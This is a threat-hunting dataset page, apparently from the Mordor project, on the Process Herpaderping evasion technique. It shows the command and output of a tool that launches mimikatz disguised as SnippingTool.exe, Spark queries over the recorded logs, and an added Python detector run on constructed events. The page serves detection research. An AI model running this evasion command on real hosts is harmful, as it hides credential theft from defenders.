Process Herpaderping Mimikatz

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/10/26

Modification Date

2020/10/26

Tactics

['TA0004', 'TA0005']

Techniques

['T1055']

Tags

None

Dataset Description

This dataset represents the execution of Process Herpaderping, a technique that obscures the intentions of a process by modifying its executable's contents on disk after the image has already been mapped into the process.

Notebooks

Notebooks created by the community leveraging the Mordor datasets

Author | Name | Link

Simulation Plan

Environment | Tool Type | Module
Lab VM | Manual | Cmd

Adversary View

C:\Users\wardog>cd Desktop

C:\Users\wardog\Desktop>ProcessHerpaderping.exe mimikatz.exe wardog.exe C:\Windows\system32\SnippingTool.exe
Process Herpaderping Tool - Copyright (c) 2020 Johnny Shaw
[12140:10252][OK]    Source File: "mimikatz.exe"
[12140:10252][OK]    Target File: "wardog.exe"
[12140:10252][INFO]  Copied source binary to target file
[12140:10252][INFO]  Created image section for target
[12140:10252][INFO]  Created process object, PID 8924
[12140:10252][INFO]  Located target image entry RVA 0x000c3aec
[12140:10252][OK]    Replacing target with "C:\Windows\system32\SnippingTool.exe"
[12140:10252][OK]    Preparing target for execution
[12140:10252][INFO]  Writing process parameters, remote PEB ProcessParameters 0x0000000000AED020
[12140:10252][INFO]  Creating thread in process at entry point 0x00007FF733E63AEC
[12140:10252][INFO]  Created thread, TID 12112
[12140:10252][OK]    Waiting for herpaderped process to exit
[12140:10252][OK]    Herpaderped process exited with code 0xc000013a
[12140:10252][OK]    Process Herpaderp Succeeded

C:\Users\wardog\Desktop>

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/defense_evasion/host/cmd_process_herpaderping_snippingtool.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+------------+------------------------------------+-------+-----+
|Hostname    |Channel                             |EventID|count|
+------------+------------------------------------+-------+-----+
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|10     |128  |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|7      |107  |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|13     |19   |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|12     |8    |
|WORKSTATION5|Security                            |4658   |4    |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|1      |3    |
|WORKSTATION5|Security                            |4688   |3    |
|WORKSTATION5|Security                            |4663   |2    |
|WORKSTATION5|Security                            |4673   |2    |
|WORKSTATION5|Security                            |4656   |2    |
|WORKSTATION5|Security                            |4690   |2    |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|11     |1    |
|WORKSTATION5|Security                            |1102   |1    |
+------------+------------------------------------+-------+-----+
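The following is an added example and is not part of the Mordor notebook or the OTRF project. It is a small pure-Python correlation, run on constructed records rather than on the dataset, that flags the pattern the Dataset Description refers to: a process whose backing file on disk is written to after the process was created from it. It pairs a Sysmon EventID 1 (process creation) with a later Security 4663 object-access event reporting WriteData on the same path. The field names (Image, ProcessId, TargetFilename, ObjectName, Accesses, ProcessName) are the ones Sysmon and the Security log use, but the records, timestamps and the notepad.exe control events are constructed, and it is an assumption that the dataset's own schema exposes the same per-event fields; in the notebook the same join would be written as Spark SQL over mordorTable.

```python
"""Added example (not from the Mordor notebook): correlate a process creation
with a later write to the process's own image file. Records are constructed."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Dict, List

SYSMON = "Microsoft-Windows-Sysmon/Operational"
SECURITY = "Security"


@dataclass
class Event:
    """One log record. `data` carries the per-event fields used here:
    Sysmon 1 (Image, ProcessId, ParentImage), Sysmon 11 (TargetFilename),
    Security 4663 (ObjectName, Accesses, ProcessName). Assumed subset."""
    hostname: str
    channel: str
    event_id: int
    utc_time: datetime
    data: Dict[str, str] = field(default_factory=dict)


def _norm(path: str) -> str:
    """Windows paths are case-insensitive, so compare them normalised."""
    return path.strip().lower()


def find_post_mapping_writes(events: List[Event],
                             window: timedelta = timedelta(minutes=5)) -> List[dict]:
    """Return one finding per Sysmon EventID 1 whose Image path receives a
    Security 4663 WriteData access after the process was created and within
    `window`. Writes before creation (e.g. the initial copy of the file) are
    ignored: the suspicious part is a write to an image that is already mapped.
    Sysmon has no file-write event, so this relies on object-access auditing
    (4663) being enabled for the path."""
    creations = [e for e in events
                 if e.channel == SYSMON and e.event_id == 1 and "Image" in e.data]
    writes = sorted((e for e in events
                     if e.channel == SECURITY and e.event_id == 4663
                     and "WriteData" in e.data.get("Accesses", "")),
                    key=lambda e: e.utc_time)
    findings = []
    for proc in creations:
        image = _norm(proc.data["Image"])
        for w in writes:
            if w.hostname != proc.hostname:
                continue
            if _norm(w.data.get("ObjectName", "")) != image:
                continue
            if proc.utc_time < w.utc_time <= proc.utc_time + window:
                findings.append({
                    "hostname": proc.hostname,
                    "image": proc.data["Image"],
                    "process_id": proc.data.get("ProcessId", ""),
                    "written_by": w.data.get("ProcessName", ""),
                    "seconds_after_create": (w.utc_time - proc.utc_time).total_seconds(),
                })
                break  # the first post-creation write is enough to report
    return findings


def sample_events() -> List[Event]:
    """Constructed records mimicking the sequence in the Adversary View: the
    tool copies the source to wardog.exe, creates a process from it (PID 8924
    as in the log above), then overwrites the file. A benign notepad.exe launch
    with a read-only access is included to show what does not match."""
    t0 = datetime(2020, 10, 26, 21, 0, 0)
    host = "WORKSTATION5"
    tool = r"C:\Users\wardog\Desktop\ProcessHerpaderping.exe"
    target = r"C:\Users\wardog\Desktop\wardog.exe"
    notepad = r"C:\Windows\System32\notepad.exe"
    explorer = r"C:\Windows\explorer.exe"
    write = "WriteData (or AddFile)"
    return [
        # initial copy of the source binary: a write BEFORE process creation
        Event(host, SECURITY, 4663, t0,
              {"ObjectName": target, "Accesses": write, "ProcessName": tool}),
        Event(host, SYSMON, 11, t0, {"Image": tool, "TargetFilename": target}),
        Event(host, SYSMON, 1, t0 + timedelta(seconds=1),
              {"Image": target, "ProcessId": "8924", "ParentImage": tool}),
        # the image file is rewritten after the process exists: the finding
        Event(host, SECURITY, 4663, t0 + timedelta(seconds=2),
              {"ObjectName": target, "Accesses": write, "ProcessName": tool}),
        Event(host, SYSMON, 1, t0 + timedelta(seconds=10),
              {"Image": notepad, "ProcessId": "4100", "ParentImage": explorer}),
        Event(host, SECURITY, 4663, t0 + timedelta(seconds=11),
              {"ObjectName": notepad, "Accesses": "ReadData (or ListDirectory)",
               "ProcessName": explorer}),
    ]


if __name__ == "__main__":
    for finding in find_post_mapping_writes(sample_events()):
        print(finding)
```

Running the block reports a single finding for PID 8924, written to one second after creation by the tool process; the pre-creation copy and the read-only notepad.exe access are not reported. The 4663 dependency is the practical caveat: on a host without a SACL on the directory, only the Sysmon 11 creation and Sysmon 1 launch of the same path are visible, which is a weaker signal.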